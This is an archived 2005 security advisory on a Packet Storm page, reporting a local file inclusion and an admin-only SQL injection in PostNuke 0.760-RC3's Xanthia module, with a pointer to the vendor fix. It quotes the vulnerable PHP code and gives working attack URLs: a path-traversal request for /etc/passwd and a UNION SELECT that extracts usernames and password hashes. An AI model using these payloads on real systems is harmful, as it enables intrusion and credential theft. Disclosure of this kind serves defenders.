exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

postnukeSQL0760rc3.txt

postnukeSQL0760rc3.txt
Posted Aug 14, 2005
Authored by Maksymilian Arciemowicz

Postnuke versions 0.760RC3 and below suffer from SQL injection attacks.

tags | exploit, sql injection
SHA-256 | d3af81e0fc22d49f4eaec7866a406567c5653a2db0e52361ec350a5075b14188

postnukeSQL0760rc3.txt

Change Mirror Download


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 2.4.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.760-RC3=>X)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Non Critical Local files include ---
This error exist in modules/Xanthia/pnadminapi.php. You can read all files in server if the PHP is bad configured and if you have admin right.

For exemple:

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3
etc.

Error message :
- ---------------
/www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053
- ---------------

or

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE]

but you can give to varible skin path to other file. Exemple for /etc/passwd

http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../../../../../../etc/passwd%00


Vulnerability code in modules/Xanthia/pnadminapi.php:

- ---1039-1052---
$cWhereIsPerso = WHERE_IS_PERSO;
if (!(empty($cWhereIsPerso))) {
$xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
$xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php';
}
else {
$xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php';
$xaninit_path = 'themes/'.$id.'/xaninit.php';
}
if (file_exists($xaninitlang_path)) {
include_once($xaninitlang_path);
}

include_once($xaninit_path);
- ---1039-1052---
etc.

- --- 2. Non critical Sql Injection ---
This sql injection is non critical because it works only with admin rights.

- -1655-1676---
$sql="SELECT $column[module] as module,
$column[block] as block,
$column[position] as position
FROM $pntable[theme_blcontrol]
WHERE $column[position]='$dati[0]'
ORDER BY $column[module]";

$result =& $dbconn->Execute($sql);
if(!$result->EOF) {
// Create output object - this object will store all of our output so that
// we can return it easily when required
$pnRender =& new pnRender('Xanthia');

// As Admin output changes often, we do not want caching.
$pnRender->caching = false;

$pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu'));
$pnRender->assign('warn', _XA_NZWARNING);
$pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE),
pnVarPrepForDisplay(_XA_BLOCK)));
while(!$result->EOF) {
$row = $result->GetRowAssoc(false);
- -1655-1676---

So if we want to make successful attack we need first log_in as postnuke administrator.
When we are administrator we can go to :

Example:

http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3&riga[1]=and&riga[2]=sp3x&skin=PiterpanV2

Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676
- ---------------

Exploit for admin:
http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/*

- --- 3. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 4. Greets ---

sp3x

- --- 5.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCju1CznmvyJCR4zQRAp43AJ4q5/3+dxSvWStOt3r839UGAqZwmQCfUeX9
FPuUJYFwC8xSOTg8ws0eSWY=
=pg2k
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close